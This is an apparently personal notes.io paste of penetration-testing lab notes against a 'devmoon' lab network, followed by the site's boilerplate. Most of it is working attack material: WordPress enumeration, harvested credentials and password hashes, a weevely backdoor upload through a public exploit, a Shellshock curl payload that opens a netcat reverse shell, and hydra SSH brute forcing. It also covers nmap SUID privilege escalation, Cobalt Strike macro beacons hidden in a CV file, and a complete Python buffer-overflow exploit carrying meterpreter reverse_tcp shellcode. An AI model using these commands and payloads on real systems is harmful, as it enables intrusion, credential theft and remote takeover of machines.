Notes
Notes - notes.io |
Contact form plugin
Slideshow gallery 1.4.7 AFU
theme : spacious - v1.2.2
USER : devmoon
PHP
PhpMyAdmin
SquirrelMail
Apache 2.4.7
:81 ClearOS
wp-content/uploads
NIKTO -h http://devmoon.lab
WPscan --url devmoon.lab --enumerate p
[!] Title: DB Backup <= 4.5 - Path Traversal File Access
Reference: https://wpvulndb.com/vulnerabilities/7726
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9119
[+] Identified the following 1 user/s:
+----+---------+---------+
| Id | Login | Name |
+----+---------+---------+
| 1 | devmoon | devmoon |
+----+---------+---------+
www wp-config.php
/** MySQL database username */
define('DB_USER', 'wordpressuser');
/** MySQL database password */
define('DB_PASSWORD', 'c00n3ctm3n0w');
phpMyAdmin WP-USER
devmoon $P$BGbV2v66mwgwFidm.GWX8PmHLEgra41 devmoon [email protected] =>> KALAMAJA 123 || 4e40128eab9b4358ab5ae6ed5d4b34bd
hash-identifier - shows type of hash
-- edit - add plain text password and add function (MD5). >GO;
weevely generate Kalamaja123at bckdoor.php
https://www.exploit-db.com/exploits/34681/ > download shell
--upload downloaded shell : python 34681.txt -t http://devmoon.lab -u devmoon -p Kalamaja123 -f bckdoor.php
use weevely to access : http://devmoon.lab/wp-content/uploads/slideshow-gallery/bckdoor.php
var/log/..
ls -laht1 | -head 5
chkrootkit.log
Searching for Suckit rootkit... Warning: /sbin/init INFECTED
metasploit
shell_tcp_reverse
1) normal
2) port 8080 and elf > update (file)
upload update file with weevly console
:upload file from to
grant execute +x
after session remove +x
administrator:$6$9bILNNZI$mDJYYh7ZtcWBGN236dfI1mUlKd3VNlxXOhe5ciRm.Ogh2e5IjovT47AIVwmQI1E3bDJop3cb1giZAQUe8HvD81:16507:0:99999:7:::
cewl --help (to generate dictionary based on data of webpage). cewl -w wordlist.txt
create notepad file hash.txt with complete line of hash.
john --wordlist=wordlist.txt hash.txt
weebiserveris endas :
netstat -tulpn
ssh listening :
make interactive shell : python -c 'import pty; pty.spawn("/bin/bash")'
reverse tunneling : ssh [email protected] -R 2222:192.168.10.5:22
SquirrelMail :
$clientdb_host = 'localhost';
$clientdb_user = 'root';
$clientdb_password = 'c00n3ctm3'; hash # $1$Uds55/wz$d4kf9qF8OjSY/A8CeWNUw1
reverse tunnel for 8080 ispconfig :
ssh [email protected] -R 2222:192.168.10.5:22
[email protected] [email protected] 4e40128eab9b4358ab5ae6ed5d4b34bd
[email protected] [email protected] $1$FdcXZOFC$p469BrVwfLN1jxfKASmo./
[email protected] [email protected] $1$zCp082rI$QoxF4zTGuK6pug3xaAQSe/
[email protected] [email protected] $1$uwruPrzH$TbW4lBU8EC4MXCVks2cX41
[email protected] [email protected] $1$3RdZGuG3$ZbeY39AyOKFz8t0RcCh3g/
hashes are salted :
generate salted new hash for users :
openssl passwd -1 Kalamaja123
Add http beacon and generate word macro.
add it to CV file.
POWER UP - HARMJ0Y
use beacon upload command to upload ps scrpit to verify different vulnerabilities.
shell sc qc "Mobile Partner, RunOuc"
generate (S) exe to upload to Mobile Partner target folder.
Restart as -f computer.
add listener for meterpeter. get system. Dump hash. Make arp scan. scan each individually.
add VPN to target 103.
Create phear0 interface
on local kali terminal insert : dhclient phear0
echo 8.8.8.8 >> /etc/resolv.conf
chattr +i /etc/resolv.conf (adds attribute to make file immune). to remove use -i
nmap -sV 192.168.0.2 to discover DC
on web 192.168.0.2 matrix.
use nikto -f 192.168.0.2 to discover -
QR code = base64 : answer : I%20see%20shellshock%20...%20everywhere...
add Netcad listener
nc -lvp 8081
in other window :
curl -H "User-Agent: () { :; }; /bin/nc 10.10.10.201 8081 -e /bin/bash & " http://192.168.0.2/cgi-bin/
on netcad windows add shell:
add shell again : python -c 'import pty; pty.spawn("/bin/bash")'
crpypo.com to unlock password from
/etc/zentyal/old/
Zentyal : 192.168.0.2:8443
Administrator
KvMDTbdmUr2yOnJCZa: devm00ndch3r3
create new domain-admin user.
ssh [email protected]
.ssh auth_keys
denis@daniel-devmoon-linux
in kali linux : hydra -l denis -t 4 -P wordlist.txt -vV 192.168.0.217 ssh
user : denis
password : deniboy
ssh [email protected]
cat hint.hoha
Download from github : LinEnum.sh
upload via cobalt strike
set chmod +x
run Linenum.sh -t
this will show that nmap has SUID bit attached.
Which means that running script through nmap - it will be ran as root
rnam --script
or better
nmap --interactive
which gives active shell
!whoami
run
!sh
gives simple shell and ! not needed.
we can see from daniel folder that he has stored private key. Lets save it.
THen lets see daniel history.
We can see that he have logged in server 192.168.0.13 as admin and with private key.
In server we can see from netstat that in server 192.168.0.13:8005 runs "moloch"
filter port ==21
we can see :
session made from 192.168.0.217 to 192.168.0.11
USER denis
PASS denimovehere
we notice that packupserver has been moved.
in denis machine look into history (exit this mode)
we see ftp login to 10.20.10.20
ftp login as denis/denismovehere success.
note : use samba
smbclient -L 10.20.10.20 -U denis
smbclient //10.20.10.20/smbdenis
PROMT
get * (while being in new "stuff" folder.
make new folder in kali.
scp * [email protected]:/root/smbdaniel
============================================
============================================
Exploit Development
Buffer Overflow
/usr/share/metasploit-framework/tools/pattern_create.rb 1000
#creates 1000 unique string
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
create new string in fuzzer.py
test :
EIP = 37684136
now run /usr/share/metasploit-framework/tools/pattern_offset.rb 37684136
result 230
EIP ="x53x93x42x7E"
generate payload in gali teminal :
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.10.201 LPORT=443 -e x86/shikata_ga_nai -b 'x00x0ax0d' -f python
autologin metasploit module
pattern_offset.rb 'value'
msfvenom -a (architecture) x86 --p (platform) windows -p windows/meterpeter/reverse_tcp LHOST = 10.10.10.201 LPORT=443 -e x86/
1: get fuzzer.py from http://10.17.10.
http://10.10.10.201:81/DevMoon.exe
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
#!/usr/bin/python
import socket
import sys
garbage1="I"*230
EIP ="x53x93x42x7E"
nopsled = "x90"*32
buf = ""
buf += "xd9xc1xb8xaax7exabx6exd9x74x24xf4x5fx31"
buf += "xc9xb1x47x31x47x18x03x47x18x83xefx56x9c"
buf += "x5ex92x4exe3xa1x6bx8ex84x28x8exbfx84x4f"
buf += "xdaxefx34x1bx8ex03xbex49x3bx90xb2x45x4c"
buf += "x11x78xb0x63xa2xd1x80xe2x20x28xd5xc4x19"
buf += "xe3x28x04x5ex1exc0x54x37x54x77x49x3cx20"
buf += "x44xe2x0exa4xccx17xc6xc7xfdx89x5dx9exdd"
buf += "x28xb2xaax57x33xd7x97x2exc8x23x63xb1x18"
buf += "x7ax8cx1ex65xb3x7fx5exa1x73x60x15xdbx80"
buf += "x1dx2ex18xfbxf9xbbxbbx5bx89x1cx60x5ax5e"
buf += "xfaxe3x50x2bx88xacx74xaax5dxc7x80x27x60"
buf += "x08x01x73x47x8cx4ax27xe6x95x36x86x17xc5"
buf += "x99x77xb2x8dx37x63xcfxcfx5fx40xe2xefx9f"
buf += "xcex75x83xadx51x2ex0bx9dx1axe8xccxe2x30"
buf += "x4cx42x1dxbbxadx4axd9xefxfdxe4xc8x8fx95"
buf += "xf4xf5x45x39xa5x59x36xfax15x19xe6x92x7f"
buf += "x96xd9x83x7fx7dx72x29x85x15x77xa4x8fx2c"
buf += "xefxbax8fxafx4bx33x69xc5xbbx12x21x71x25"
buf += "x3fxb9xe0xaax95xc7x22x20x1ax37xecxc1x57"
buf += "x2bx98x21x22x11x0ex3dx98x3cxaexabx27x97"
buf += "xf9x43x2axcexcdxcbxd5x25x46xc5x43x86x30"
buf += "x2ax84x06xc0x7cxcex06xa8xd8xaax54xcdx26"
buf += "x67xc9x5exb3x88xb8x33x14xe1x46x6ax52xae"
buf += "xb9x59x62x92x6fxa7x10xfaxb3"
garbage2="B"*(1000-len(garbage1+EIP+buf+nopsled))
payload=garbage1 + EIP+nopsled+buf+ garbage2
print "Fuzzing PASS with %s bytes" % len(payload)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('10.10.10.200',21))
s.recv(1024)
s.send('USER ' + payload + 'rn')
s.recv(1024)
s.close()
|
|
Notes.io is a web-based application for taking notes. You can take your notes and share with others people. If you like taking long notes, notes.io is designed for you. To date, over 8,000,000,000 notes created and continuing...
With notes.io;
- * You can take a note from anywhere and any device with internet connection.
- * You can share the notes in social platforms (YouTube, Facebook, Twitter, instagram etc.).
- * You can quickly share your contents without website, blog and e-mail.
- * You don't need to create any Account to share a note. As you wish you can use quick, easy and best shortened notes with sms, websites, e-mail, or messaging services (WhatsApp, iMessage, Telegram, Signal).
- * Notes.io has fabulous infrastructure design for a short link and allows you to share the note as an easy and understandable link.
Fast: Notes.io is built for speed and performance. You can take a notes quickly and browse your archive.
Easy: Notes.io doesn’t require installation. Just write and share note!
Short: Notes.io’s url just 8 character. You’ll get shorten link of your note when you want to share. (Ex: notes.io/q )
Free: Notes.io works for 12 years and has been free since the day it was started.
You immediately create your first note and start sharing with the ones you wish. If you want to contact us, you can use the following communication channels;
Email: [email protected]
Twitter: http://twitter.com/notesio
Instagram: http://instagram.com/notes.io
Facebook: http://facebook.com/notesio
Regards;
Notes.io Team
